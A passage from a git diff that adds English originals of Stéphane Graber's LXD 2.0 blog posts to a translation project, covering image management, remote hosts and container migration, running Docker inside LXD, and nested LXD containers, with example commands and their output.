++---------------+--------------+--------+------------------------------------------------------+--------+----------+------------------------------+
+| w (11 more) | d3703a994910 | no | ubuntu 15.10 amd64 (release) (20160315) | x86_64 | 153.35MB | Mar 30, 2016 at 4:31am (UTC) |
++---------------+--------------+--------+------------------------------------------------------+--------+----------+------------------------------+
+| | 75182b1241be | no | ubuntu 14.04 LTS amd64 (release) (20160314) | x86_64 | 118.17MB | Mar 30, 2016 at 4:27am (UTC) |
++---------------+--------------+--------+------------------------------------------------------+--------+----------+------------------------------+
+```
+
+You can filter based on the alias or fingerprint simply by doing:
+
+```
+stgraber@dakara:~$ lxc image list amd64
++---------------+--------------+--------+-----------------------------------------+--------+----------+------------------------------+
+| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
++---------------+--------------+--------+-----------------------------------------+--------+----------+------------------------------+
+| busybox-amd64 | 74186c79ca2f | no | Busybox x86_64 | x86_64 | 0.79MB | Mar 30, 2016 at 4:33am (UTC) |
++---------------+--------------+--------+-----------------------------------------+--------+----------+------------------------------+
+| w (11 more) | d3703a994910 | no | ubuntu 15.10 amd64 (release) (20160315) | x86_64 | 153.35MB | Mar 30, 2016 at 4:31am (UTC) |
++---------------+--------------+--------+-----------------------------------------+--------+----------+------------------------------+
+```
+
+Or by specifying a key=value filter of image properties:
+
+```
+stgraber@dakara:~$ lxc image list os=ubuntu
++-------------+--------------+--------+---------------------------------------------+--------+----------+------------------------------+
+| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
++-------------+--------------+--------+---------------------------------------------+--------+----------+------------------------------+
+| old-ubuntu | 4d558b08f22f | no | ubuntu 12.04 LTS amd64 (release) (20160315) | x86_64 | 155.09MB | Mar 30, 2016 at 4:30am (UTC) |
++-------------+--------------+--------+---------------------------------------------+--------+----------+------------------------------+
+| w (11 more) | d3703a994910 | no | ubuntu 15.10 amd64 (release) (20160315) | x86_64 | 153.35MB | Mar 30, 2016 at 4:31am (UTC) |
++-------------+--------------+--------+---------------------------------------------+--------+----------+------------------------------+
+| | 75182b1241be | no | ubuntu 14.04 LTS amd64 (release) (20160314) | x86_64 | 118.17MB | Mar 30, 2016 at 4:27am (UTC) |
++-------------+--------------+--------+---------------------------------------------+--------+----------+------------------------------+
+```
+
+To see everything LXD knows about a given image, you can use “lxc image info”:
+
+```
+stgraber@castiana:~$ lxc image info ubuntu
+Fingerprint: e8a33ec326ae7dd02331bd72f5d22181ba25401480b8e733c247da5950a7d084
+Size: 139.43MB
+Architecture: i686
+Public: no
+Timestamps:
+ Created: 2016/03/15 00:00 UTC
+ Uploaded: 2016/03/16 05:50 UTC
+ Expires: 2017/04/26 00:00 UTC
+Properties:
+ version: 12.04
+ aliases: 12.04,p,precise
+ architecture: i386
+ description: ubuntu 12.04 LTS i386 (release) (20160315)
+ label: release
+ os: ubuntu
+ release: precise
+ serial: 20160315
+Aliases:
+ - ubuntu
+Auto update: enabled
+Source:
+ Server: https://cloud-images.ubuntu.com/releases
+ Protocol: simplestreams
+ Alias: precise/i386
+```
+
+##### Editing images
+
+A convenient way to edit image properties and some of the flags is to use:
+
+```
+lxc image edit <image>
+```
+
+This opens up your default text editor with something like this:
+
+```
+autoupdate: true
+properties:
+  aliases: 14.04,default,lts,t,trusty
+  architecture: amd64
+  description: ubuntu 14.04 LTS amd64 (release) (20160314)
+  label: release
+  os: ubuntu
+  release: trusty
+  serial: "20160314"
+  version: "14.04"
+public: false
+```
+
+You can change any property you want, turn auto-update on and off or mark an image as publicly available (more on that later).
+
+##### Deleting images
+
+Removing an image is a simple matter of running:
+
+```
+lxc image delete <image>
+```
+
+Note that you don’t have to remove cached entries; those will automatically be removed by LXD after they expire (by default, 10 days after they were last used).
+
+##### Exporting images
+
+If you want to get image tarballs from images currently in your image store, you can use “lxc image export”, like:
+
+```
+stgraber@dakara:~$ lxc image export old-ubuntu .
+Output is in .
+stgraber@dakara:~$ ls -lh *.tar.xz
+-rw------- 1 stgraber domain admins 656 Mar 30 00:55 meta-ubuntu-12.04-server-cloudimg-amd64-lxd.tar.xz
+-rw------- 1 stgraber domain admins 156M Mar 30 00:55 ubuntu-12.04-server-cloudimg-amd64-lxd.tar.xz
+```
+
+#### Image formats
+
+LXD right now supports two image layouts, unified or split. Both of those are effectively LXD-specific though the latter makes it easier to re-use the filesystem with other container or virtual machine runtimes.
+
+LXD, being solely focused on system containers, doesn’t support any of the application container “standard” image formats out there, nor do we plan to.
+
+Our images are pretty simple, they’re made of a container filesystem, a metadata file describing things like when the image was made, when it expires, what architecture it’s for, … and optionally a bunch of file templates.
+
+See this document for up to date details on the [image format][1].
+
+##### Unified image (single tarball)
+
+The unified image format is what LXD uses when generating images itself. They are a single big tarball, containing the container filesystem inside a “rootfs” directory, have the metadata.yaml file at the root of the tarball and any template goes into a “templates” directory.
+
+Any compression (or none at all) can be used for that tarball. The image hash is the sha256 of the resulting compressed tarball.
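+
+As a rough sketch, building and hashing a unified image by hand could look like this; the directory layout and file names are assumptions based on the description above:
+
+```
+# image-dir/ contains metadata.yaml, rootfs/ and (optionally) templates/
+tar -Jcf image.tar.xz -C image-dir metadata.yaml rootfs templates
+sha256sum image.tar.xz   # this is the image fingerprint
+```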
+
+##### Split image (two tarballs)
+
+This format is most commonly used by anyone rolling their own images and who already have a compressed filesystem tarball.
+
+They are made of two distinct tarballs. The first contains just the metadata bits that LXD uses, so the metadata.yaml file at the root and any template in the “templates” directory.
+
+The second tarball contains only the container filesystem directly at its root. Most distributions already produce such tarballs as they are common for bootstrapping new machines. This image format allows re-using them unmodified.
+
+Any compression (or none at all) can be used for either tarball, they can absolutely use different compression algorithms. The image hash is the sha256 of the concatenation of the metadata and rootfs tarballs.
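+
+That concatenation rule is easy to reproduce by hand; the file names here are just examples:
+
+```
+# fingerprint of a split image: metadata tarball first, then rootfs tarball
+cat meta.tar.xz rootfs.tar.xz | sha256sum
+```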
+
+##### Image metadata
+
+A typical metadata.yaml file looks something like:
+
+```
+architecture: "i686"
+creation_date: 1458040200
+properties:
+ architecture: "i686"
+ description: "Ubuntu 12.04 LTS server (20160315)"
+ os: "ubuntu"
+ release: "precise"
+templates:
+ /var/lib/cloud/seed/nocloud-net/meta-data:
+ when:
+ - start
+ template: cloud-init-meta.tpl
+ /var/lib/cloud/seed/nocloud-net/user-data:
+ when:
+ - start
+ template: cloud-init-user.tpl
+ properties:
+ default: |
+ #cloud-config
+ {}
+ /var/lib/cloud/seed/nocloud-net/vendor-data:
+ when:
+ - start
+ template: cloud-init-vendor.tpl
+ properties:
+ default: |
+ #cloud-config
+ {}
+ /etc/init/console.override:
+ when:
+ - create
+ template: upstart-override.tpl
+ /etc/init/tty1.override:
+ when:
+ - create
+ template: upstart-override.tpl
+ /etc/init/tty2.override:
+ when:
+ - create
+ template: upstart-override.tpl
+ /etc/init/tty3.override:
+ when:
+ - create
+ template: upstart-override.tpl
+ /etc/init/tty4.override:
+ when:
+ - create
+ template: upstart-override.tpl
+```
+
+##### Properties
+
+The only two mandatory fields are the creation date (UNIX epoch) and the architecture. Everything else can be left unset and the image will import fine.
+
+The extra properties are mainly there to help the user figure out what the image is about. The “description” property for example is what’s visible in “lxc image list”. The other properties can be used by the user to search for specific images using key/value search.
+
+Those properties can then be edited by the user through “lxc image edit”; in contrast, the creation date and architecture fields are immutable.
+
+##### Templates
+
+The template mechanism allows for some files in the container to be generated or re-generated at some point in the container lifecycle.
+
+We use the pongo2 templating engine for those and we export just about everything we know about the container to the template. That way you can have custom images which use user-defined container properties or normal LXD properties to change the content of some specific files.
+
+As you can see in the example above, we’re using those in Ubuntu to seed cloud-init and to turn off some init scripts.
+
+### Creating your own images
+
+LXD being focused on running full Linux systems means that we expect most users to just use clean distribution images and not spin their own image.
+
+However there are a few cases where having your own images is useful, such as having pre-configured images of your production servers or building your own images for a distribution or architecture that we don’t build images for.
+
+#### Turning a container into an image
+
+The easiest way by far to build an image with LXD is to just turn a container into an image.
+
+This can be done with:
+
+```
+lxc launch ubuntu:14.04 my-container
+lxc exec my-container bash
+
+lxc publish my-container --alias my-new-image
+```
+
+You can even turn a past container snapshot into a new image:
+
+```
+lxc publish my-container/some-snapshot --alias some-image
+```
+
+#### Manually building an image
+
+Building your own image is also pretty simple.
+
+1. Generate a container filesystem. This entirely depends on the distribution you’re using. For Ubuntu and Debian, it would be by using debootstrap.
+2. Configure anything that’s needed for the distribution to work properly in a container (if anything is needed).
+3. Make a tarball of that container filesystem, optionally compress it.
+4. Write a new metadata.yaml file based on the one described above.
+5. Create another tarball containing that metadata.yaml file.
+6. Import those two tarballs as a LXD image with:
+ ```
+ lxc image import <metadata tarball> <rootfs tarball> --alias some-name
+ ```
+
+You will probably need to go through this a few times before everything works, tweaking things here and there, possibly adding some templates and properties.
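+
+Put together, a minimal run through those steps for a Debian-family distribution might look like this; it is only a sketch with example names, and step 2 usually needs real work:
+
+```
+# 1. bootstrap a filesystem (here: Ubuntu xenial)
+sudo debootstrap xenial rootfs-dir
+# 3. tarball of the container filesystem, directly at its root
+sudo tar -Jcf rootfs.tar.xz -C rootfs-dir .
+# 4./5. put metadata.yaml (and optional templates/) in their own tarball
+tar -Jcf meta.tar.xz metadata.yaml
+# 6. import both as a split image
+lxc image import meta.tar.xz rootfs.tar.xz --alias my-manual-image
+```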
+
+### Publishing your images
+
+All LXD daemons act as image servers. Unless told otherwise, all images loaded in the image store are marked as private and so only trusted clients can retrieve those images. But should you want to make a public image server, all you have to do is tag a few images as public and make sure your LXD daemon is listening to the network.
+
+#### Just running a public LXD server
+
+The easiest way to share LXD images is to run a publicly visible LXD daemon.
+
+You typically do that by running:
+
+```
+lxc config set core.https_address "[::]:8443"
+```
+
+Remote users can then add your server as a public image server with:
+
+```
+lxc remote add <name> <IP or FQDN> --public
+```
+
+They can then use it just as they would any of the default image servers. As the remote server was added with “--public”, no authentication is required and the client is restricted to images which have themselves been marked as public.
+
+To change what images are public, just “lxc image edit” them and set the public flag to true.
+
+#### Use a static web server
+
+As mentioned above, “lxc image import” supports downloading from a static http server. The requirements are basically:
+
+* The server must support HTTPS with a valid certificate, TLS 1.2 and EC ciphers
+* When hitting the URL provided to “lxc image import”, the server must return an answer including the LXD-Image-Hash and LXD-Image-URL HTTP headers
+
+If you want to make this dynamic, you can have your server look for the LXD-Server-Architectures and LXD-Server-Version HTTP headers which LXD will provide when fetching the image. This allows you to return the right image for the server’s architecture.
+
+#### Build a simplestreams server
+
+The “ubuntu:” and “ubuntu-daily:” remotes aren’t using the LXD protocol (“images:” is); those are instead using a different protocol called simplestreams.
+
+simplestreams is basically an image server description format, using JSON to describe a list of products and files related to those products.
+
+It is used by a variety of tools like OpenStack, Juju, MAAS, … to find, download or mirror system images and LXD supports it as a native protocol for image retrieval.
+
+While certainly not the easiest way to start providing LXD images, it may be worth considering if your images can also be used by some of those other tools.
+
+More information can be found [here][2].
+
+### Conclusion
+
+I hope this gave you a good idea of how LXD manages its images and how to build and distribute your own. The ability to have the exact same image easily available bit for bit on a bunch of globally distributed systems is a big step up from the old LXC days and leads the way to more reproducible infrastructure.
+
+### Extra information
+
+The main LXD website is at: <https://linuxcontainers.org/lxd>
+Development happens on Github at: <https://github.com/lxc/lxd>
+Mailing-list support happens on: <https://lists.linuxcontainers.org>
+IRC support happens in: #lxcontainers on irc.freenode.net
+
+And if you don’t want or can’t install LXD on your own machine, you can always [try it online instead][3]!
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.stgraber.org/2016/03/30/lxd-2-0-image-management-512/
+
+作者:[Stéphane Graber][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://www.stgraber.org/author/stgraber/
+[0]: https://www.stgraber.org/2016/03/11/lxd-2-0-blog-post-series-012/
+[1]: https://github.com/lxc/lxd/blob/master/doc/image-handling.md
+[2]: https://launchpad.net/simplestreams
+[3]: https://linuxcontainers.org/lxd/try-it
diff --git a/sources/tech/LXD/Part 6 - LXD 2.0--Remote hosts and container migration.md b/sources/tech/LXD/Part 6 - LXD 2.0--Remote hosts and container migration.md
new file mode 100644
index 0000000000..bbeb4f3eea
--- /dev/null
+++ b/sources/tech/LXD/Part 6 - LXD 2.0--Remote hosts and container migration.md
@@ -0,0 +1,209 @@
+Part 6 - LXD 2.0: Remote hosts and container migration
+=======================================================
+
+This is the sixth blog post [in this series about LXD 2.0][0].
+
+![](https://linuxcontainers.org/static/img/containers.png)
+
+### Remote protocols
+
+LXD 2.0 supports two protocols:
+
+* LXD 1.0 API: That’s the REST API used between the clients and a LXD daemon as well as between LXD daemons when copying/moving images and containers.
+* Simplestreams: The Simplestreams protocol is a read-only, image-only protocol used by both the LXD client and daemon to get image information and import images from some public image servers (like the Ubuntu images).
+
+Everything below will be using the first of those two.
+
+### Security
+
+Authentication for the LXD API is done through client certificate authentication over TLS 1.2 using recent ciphers. When two LXD daemons must exchange information directly, a temporary token is generated by the source daemon and transferred through the client to the target daemon. This token may only be used to access a particular stream and is immediately revoked so cannot be re-used.
+
+To avoid man-in-the-middle attacks, the client tool also sends the certificate of the source server to the target. That means that for a particular download operation, the target server is provided with the source server URL, a one-time access token for the resource it needs and the certificate that the server is supposed to be using. This prevents MITM attacks and only gives temporary access to the object of the transfer.
+
+### Network requirements
+
+LXD 2.0 uses a model where the target of an operation (the receiving end) is connecting directly to the source to fetch the data.
+
+This means that you must ensure that the target server can connect to the source directly, updating any needed firewall along the way.
+
+We have [a plan][1] to allow this to be reversed and also to allow proxying through the client itself for those rare cases where draconian firewalls are preventing any communication between the two hosts.
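+
+For example, with a ufw-based firewall on the source host, that could mean something like this; the address is a placeholder and 8443 is LXD’s default HTTPS port:
+
+```
+sudo ufw allow from <target IP> to any port 8443 proto tcp
+```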
+
+### Interacting with remote hosts
+
+Rather than having our users have to always provide hostname or IP addresses and then validating certificate information whenever they want to interact with a remote host, LXD is using the concept of “remotes”.
+
+By default, the only real LXD remote configured is “local:” which also happens to be the default remote (so you don’t have to type its name). The local remote uses the LXD REST API to talk to the local daemon over a unix socket.
+
+### Adding a remote
+
+Say you have two machines with LXD installed, your local machine and a remote host that we’ll call “foo”.
+
+First you need to make sure that “foo” is listening to the network and has a password set, so get a remote shell on it and run:
+
+```
+lxc config set core.https_address [::]:8443
+lxc config set core.trust_password something-secure
+```
+
+Now on your local LXD, we just need to make it visible to the network so we can transfer containers and images from it:
+
+```
+lxc config set core.https_address [::]:8443
+```
+
+Now that the daemon configuration is done on both ends, you can add “foo” to your local client with:
+
+```
+lxc remote add foo 1.2.3.4
+```
+
+(replacing 1.2.3.4 with your IP address or FQDN)
+
+You’ll see something like this:
+
+```
+stgraber@dakara:~$ lxc remote add foo 2607:f2c0:f00f:2770:216:3eff:fee1:bd67
+Certificate fingerprint: fdb06d909b77a5311d7437cabb6c203374462b907f3923cefc91dd5fce8d7b60
+ok (y/n)? y
+Admin password for foo:
+Client certificate stored at server: foo
+```
+
+You can then list your remotes and you’ll see “foo” listed there:
+
+```
+stgraber@dakara:~$ lxc remote list
++-----------------+-------------------------------------------------------+---------------+--------+--------+
+| NAME | URL | PROTOCOL | PUBLIC | STATIC |
++-----------------+-------------------------------------------------------+---------------+--------+--------+
+| foo | https://[2607:f2c0:f00f:2770:216:3eff:fee1:bd67]:8443 | lxd | NO | NO |
++-----------------+-------------------------------------------------------+---------------+--------+--------+
+| images | https://images.linuxcontainers.org:8443 | lxd | YES | NO |
++-----------------+-------------------------------------------------------+---------------+--------+--------+
+| local (default) | unix:// | lxd | NO | YES |
++-----------------+-------------------------------------------------------+---------------+--------+--------+
+| ubuntu | https://cloud-images.ubuntu.com/releases | simplestreams | YES | YES |
++-----------------+-------------------------------------------------------+---------------+--------+--------+
+| ubuntu-daily | https://cloud-images.ubuntu.com/daily | simplestreams | YES | YES |
++-----------------+-------------------------------------------------------+---------------+--------+--------+
+```
+
+### Interacting with it
+
+Ok, so we have a remote server defined, what can we do with it now?
+
+Well, just about everything you saw in the posts until now, the only difference being that you must tell LXD what host to run against.
+
+For example:
+
+```
+lxc launch ubuntu:14.04 c1
+```
+
+Will run on the default remote (“lxc remote get-default”) which is your local host.
+
+```
+lxc launch ubuntu:14.04 foo:c1
+```
+
+Will instead run on foo.
+
+Listing running containers on a remote host can be done with:
+
+```
+stgraber@dakara:~$ lxc list foo:
++------+---------+---------------------+-----------------------------------------------+------------+-----------+
+| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
++------+---------+---------------------+-----------------------------------------------+------------+-----------+
+| c1 | RUNNING | 10.245.81.95 (eth0) | 2607:f2c0:f00f:2770:216:3eff:fe43:7994 (eth0) | PERSISTENT | 0 |
++------+---------+---------------------+-----------------------------------------------+------------+-----------+
+```
+
+One thing to keep in mind is that you have to specify the remote host for both images and containers. So if you have a local image called “my-image” on “foo” and want to create a container called “c2” from it, you have to run:
+
+```
+lxc launch foo:my-image foo:c2
+```
+
+Finally, getting a shell into a remote container works just as you would expect:
+
+```
+lxc exec foo:c1 bash
+```
+
+### Copying containers
+
+Copying containers between hosts is as easy as it sounds:
+
+```
+lxc copy foo:c1 c2
+```
+
+And you’ll have a new local container called “c2” created from a copy of the remote “c1” container. This requires “c1” to be stopped first, but you could just copy a snapshot instead and do it while the source container is running:
+
+```
+lxc snapshot foo:c1 current
+lxc copy foo:c1/current c3
+```
+
+### Moving containers
+
+Unless you’re doing live migration (which will be covered in a later post), you have to stop the source container prior to moving it, after which everything works as you’d expect.
+
+```
+lxc stop foo:c1
+lxc move foo:c1 local:
+```
+
+This example is functionally identical to:
+
+```
+lxc stop foo:c1
+lxc move foo:c1 c1
+```
+
+### How this all works
+
+Interactions with remote containers work as you would expect: rather than using the REST API over a local Unix socket, LXD just uses the exact same API over a remote HTTPS transport.
+
+Where it gets a bit trickier is when interaction between two daemons must occur, as is the case for copy and move.
+
+In those cases the following happens:
+
+1. The user runs “lxc move foo:c1 c1”.
+2. The client contacts the local: remote to check for an existing “c1” container.
+3. The client fetches container information from “foo”.
+4. The client requests a migration token from the source “foo” daemon.
+5. The client sends that migration token as well as the source URL and “foo”’s certificate to the local LXD daemon alongside the container configuration and devices.
+6. The local LXD daemon then connects directly to “foo” using the provided token
+ A. It connects to a first control websocket
+ B. It negotiates the filesystem transfer protocol (zfs send/receive, btrfs send/receive or plain rsync)
+ C. If available locally, it unpacks the image which was used to create the source container. This is to avoid needless data transfer.
+ D. It then transfers the container and any of its snapshots as a delta.
+7. If successful, the client then instructs “foo” to delete the source container.
+
+### Try all this online
+
+Don’t have two machines to try remote interactions and moving/copying containers?
+
+That’s okay, you can test it all online using our [demo service][2].
+The included step-by-step walkthrough even covers it!
+
+### Extra information
+
+The main LXD website is at: <https://linuxcontainers.org/lxd>
+Development happens on Github at: <https://github.com/lxc/lxd>
+Mailing-list support happens on: <https://lists.linuxcontainers.org>
+IRC support happens in: #lxcontainers on irc.freenode.net
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.stgraber.org/2016/03/19/lxd-2-0-your-first-lxd-container-312/
+
+作者:[Stéphane Graber][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://www.stgraber.org/author/stgraber/
+[0]: https://www.stgraber.org/2016/03/11/lxd-2-0-blog-post-series-012/
+[1]: https://github.com/lxc/lxd/issues/553
+[2]: https://linuxcontainers.org/lxd/try-it/
diff --git a/sources/tech/LXD/Part 7 - LXD 2.0--Docker in LXD.md b/sources/tech/LXD/Part 7 - LXD 2.0--Docker in LXD.md
new file mode 100644
index 0000000000..d9b35735b8
--- /dev/null
+++ b/sources/tech/LXD/Part 7 - LXD 2.0--Docker in LXD.md
@@ -0,0 +1,145 @@
+Part 7 - LXD 2.0: Docker in LXD
+==================================
+
+This is the seventh blog post [in this series about LXD 2.0][0].
+
+![](https://linuxcontainers.org/static/img/containers.png)
+
+### Why run Docker inside LXD
+
+As I briefly covered in the [first post of this series][1], LXD’s focus is system containers. That is, we run a full unmodified Linux distribution inside our containers. LXD for all intents and purposes doesn’t care about the workload running in the container. It just sets up the container namespaces and security policies, then spawns /sbin/init and waits for the container to stop.
+
+Application containers such as those implemented by Docker or Rkt are pretty different in that they are used to distribute applications, will typically run a single main process inside them and be much more ephemeral than a LXD container.
+
+Those two container types aren’t mutually exclusive and we certainly see the value of using Docker containers to distribute applications. That’s why we’ve been working hard over the past year to make it possible to run Docker inside LXD.
+
+This means that with Ubuntu 16.04 and LXD 2.0, you can create containers for your users who will then be able to connect into them just like a normal Ubuntu system and then run Docker to install the services and applications they want.
+
+### Requirements
+
+There are a lot of moving pieces to make all of this work, and we got them all included in Ubuntu 16.04:
+
+- A kernel with CGroup namespace support (4.4 Ubuntu or 4.6 mainline)
+- LXD 2.0 using LXC 2.0 and LXCFS 2.0
+- A custom version of Docker (or one built with all the patches that we submitted)
+- A Docker image which behaves when confined by user namespaces, or alternatively make the parent LXD container a privileged container (security.privileged=true)
+
+### Running a basic Docker workload
+
+Enough talking, let’s run some Docker containers!
+
+First of all, you need an Ubuntu 16.04 container which you can get with:
+
+```
+lxc launch ubuntu-daily:16.04 docker -p default -p docker
+```
+
+The “-p default -p docker” instructs LXD to apply both the “default” and “docker” profiles to the container. The default profile contains the basic network configuration while the docker profile tells LXD to load a few required kernel modules and set up some mounts for the container. The docker profile also enables container nesting.
+
+Now let’s make sure the container is up to date and install Docker:
+
+```
+lxc exec docker -- apt update
+lxc exec docker -- apt dist-upgrade -y
+lxc exec docker -- apt install docker.io -y
+```
+
+And that’s it! You’ve got Docker installed and running in your container.
+
+Now let’s start a basic web service made of two Docker containers:
+
+```
+stgraber@dakara:~$ lxc exec docker -- docker run --detach --name app carinamarina/hello-world-app
+Unable to find image 'carinamarina/hello-world-app:latest' locally
+latest: Pulling from carinamarina/hello-world-app
+efd26ecc9548: Pull complete
+a3ed95caeb02: Pull complete
+d1784d73276e: Pull complete
+72e581645fc3: Pull complete
+9709ddcc4d24: Pull complete
+2d600f0ec235: Pull complete
+c4cf94f61cbd: Pull complete
+c40f2ab60404: Pull complete
+e87185df6de7: Pull complete
+62a11c66eb65: Pull complete
+4c5eea9f676d: Pull complete
+498df6a0d074: Pull complete
+Digest: sha256:6a159db50cb9c0fbe127fb038ed5a33bb5a443fcdd925ec74bf578142718f516
+Status: Downloaded newer image for carinamarina/hello-world-app:latest
+c8318f0401fb1e119e6c5bb23d1e706e8ca080f8e44b42613856ccd0bf8bfb0d
+
+stgraber@dakara:~$ lxc exec docker -- docker run --detach --name web --link app:helloapp -p 80:5000 carinamarina/hello-world-web
+Unable to find image 'carinamarina/hello-world-web:latest' locally
+latest: Pulling from carinamarina/hello-world-web
+efd26ecc9548: Already exists
+a3ed95caeb02: Already exists
+d1784d73276e: Already exists
+72e581645fc3: Already exists
+9709ddcc4d24: Already exists
+2d600f0ec235: Already exists
+c4cf94f61cbd: Already exists
+c40f2ab60404: Already exists
+e87185df6de7: Already exists
+f2d249ff479b: Pull complete
+97cb83fe7a9a: Pull complete
+d7ce7c58a919: Pull complete
+Digest: sha256:c31cf04b1ab6a0dac40d0c5e3e64864f4f2e0527a8ba602971dab5a977a74f20
+Status: Downloaded newer image for carinamarina/hello-world-web:latest
+d7b8963401482337329faf487d5274465536eebe76f5b33c89622b92477a670f
+```
+
+With those two Docker containers now running, we can then get the IP address of our LXD container and access the service!
+
+```
+stgraber@dakara:~$ lxc list
++--------+---------+----------------------+----------------------------------------------+------------+-----------+
+| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
++--------+---------+----------------------+----------------------------------------------+------------+-----------+
+| docker | RUNNING | 172.17.0.1 (docker0) | 2001:470:b368:4242:216:3eff:fe55:45f4 (eth0) | PERSISTENT | 0 |
+| | | 10.178.150.73 (eth0) | | | |
++--------+---------+----------------------+----------------------------------------------+------------+-----------+
+
+stgraber@dakara:~$ curl http://10.178.150.73
+The linked container said... "Hello World!"
+```
+
+### Conclusion
+
+That’s it! It’s really that simple to run Docker containers inside a LXD container.
+
+Now as I mentioned earlier, not all Docker images will behave as well as my example; that’s typically because of the extra confinement that comes with LXD, specifically the user namespace.
+
+Only the overlayfs storage driver of Docker works in this mode. That storage driver may come with its own set of limitations which may further limit how many images will work in this environment.
+
+If your workload doesn’t work properly and you trust the user inside the LXD container, you can try:
+
+```
+lxc config set docker security.privileged true
+lxc restart docker
+```
+
+That will deactivate the user namespace and run the container in privileged mode.
+
+Note however that in this mode, root inside the container is the same uid as root on the host. There are a number of known ways for users to escape such containers and gain root privileges on the host, so you should only ever do that if you’d trust the user inside your LXD container with root privileges on the host.
+
+### Extra information
+
+The main LXD website is at: <https://linuxcontainers.org/lxd>
+Development happens on Github at: <https://github.com/lxc/lxd>
+Mailing-list support happens on: <https://lists.linuxcontainers.org>
+IRC support happens in: #lxcontainers on irc.freenode.net
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.stgraber.org/2016/04/13/lxd-2-0-docker-in-lxd-712/
+
+作者:[Stéphane Graber][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://www.stgraber.org/author/stgraber/
+[0]: https://www.stgraber.org/2016/03/11/lxd-2-0-blog-post-series-012/
+[1]: https://www.stgraber.org/2016/03/11/lxd-2-0-introduction-to-lxd-112/
+[2]: https://linuxcontainers.org/lxd/try-it/
diff --git a/sources/tech/LXD/Part 8 - LXD 2.0--LXD in LXD.md b/sources/tech/LXD/Part 8 - LXD 2.0--LXD in LXD.md
new file mode 100644
index 0000000000..85d9873313
--- /dev/null
+++ b/sources/tech/LXD/Part 8 - LXD 2.0--LXD in LXD.md
@@ -0,0 +1,126 @@
+Part 8 - LXD 2.0: LXD in LXD
+==============================
+
+This is the eighth blog post [in this series about LXD 2.0][0].
+
+![](https://linuxcontainers.org/static/img/containers.png)
+
+### Introduction
+
+In the previous post I covered how to run [Docker inside LXD][1], which is a good way to get access to the portfolio of applications provided by Docker while running in the safety of the LXD environment.
+
+One use case I mentioned was offering a LXD container to your users and then having them use their container to run Docker. Well, what if they themselves want to run other Linux distributions inside their container using LXD, or even allow another group of people to have access to a Linux system by running a container for them?
+
+Turns out, LXD makes it very simple to allow your users to run nested containers.
+
+### Nesting LXD
+
+The simplest case can be shown by using an Ubuntu 16.04 image. Ubuntu 16.04 cloud images come with LXD pre-installed. The daemon itself isn’t running, as it’s socket-activated, so it doesn’t use any resources until you actually talk to it.
+
+So let’s start an Ubuntu 16.04 container with nesting enabled:
+
+```
+lxc launch ubuntu-daily:16.04 c1 -c security.nesting=true
+```
+
+You can also set the security.nesting key on an existing container with:
+
+```
+lxc config set <container> security.nesting true
+```
+
+Or for all containers using a particular profile with:
+
+```
+lxc profile set <profile> security.nesting true
+```
+
+With that container started, you can now get a shell inside it, configure LXD and spawn a container:
+
+```
+stgraber@dakara:~$ lxc launch ubuntu-daily:16.04 c1 -c security.nesting=true
+Creating c1
+Starting c1
+
+stgraber@dakara:~$ lxc exec c1 bash
+root@c1:~# lxd init
+Name of the storage backend to use (dir or zfs): dir
+
+We detected that you are running inside an unprivileged container.
+This means that unless you manually configured your host otherwise,
+you will not have enough uid and gid to allocate to your containers.
+
+LXD can re-use your container's own allocation to avoid the problem.
+Doing so makes your nested containers slightly less safe as they could
+in theory attack their parent container and gain more privileges than
+they otherwise would.
+
+Would you like to have your containers share their parent's allocation (yes/no)? yes
+Would you like LXD to be available over the network (yes/no)? no
+Do you want to configure the LXD bridge (yes/no)? yes
+Warning: Stopping lxd.service, but it can still be activated by:
+ lxd.socket
+LXD has been successfully configured.
+
+root@c1:~# lxc launch ubuntu:14.04 trusty
+Generating a client certificate. This may take a minute...
+If this is your first time using LXD, you should also run: sudo lxd init
+
+Creating trusty
+Retrieving image: 100%
+Starting trusty
+
+root@c1:~# lxc list
++--------+---------+-----------------------+----------------------------------------------+------------+-----------+
+| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
++--------+---------+-----------------------+----------------------------------------------+------------+-----------+
+| trusty | RUNNING | 10.153.141.124 (eth0) | fd7:f15d:d1d6:da14:216:3eff:fef1:4002 (eth0) | PERSISTENT | 0 |
++--------+---------+-----------------------+----------------------------------------------+------------+-----------+
+root@c1:~#
+```
+
+It really is that simple!
+
+### The online demo server
+
+As this post is pretty short, I figured I would spend a bit of time to talk about the [demo server][2] we’re running. We also just reached the 10000 sessions mark earlier today!
+
+That server is basically just a normal LXD running inside a pretty beefy virtual machine with a tiny daemon implementing the REST API used by our website.
+
+When you accept the terms of service, a new LXD container is created for you with security.nesting enabled as we saw above. You are then attached to that container as you would when using “lxc exec” except that we’re doing it using websockets and javascript.
+
+The containers you then create inside this environment are all nested LXD containers.
+You can then nest even further in there if you want to.
+
+We are using the whole range of [LXD resource limitations][3] to prevent one user’s actions from impacting the others and pretty closely monitor the server for any sign of abuse.
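+
+To give a rough idea, here is a sketch of the kind of per-container limits involved, using the limits.* configuration keys from the resource control post linked above (the container name and values are made up for illustration):
+
+```
+lxc config set c1 limits.cpu 2
+lxc config set c1 limits.cpu.allowance 50%
+lxc config set c1 limits.memory 256MB
+```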
+
+If you want to run your own similar server, you can grab the code for our website and the daemon with:
+
+```
+git clone https://github.com/lxc/linuxcontainers.org
+git clone https://github.com/lxc/lxd-demo-server
+```
+
+### Extra information
+
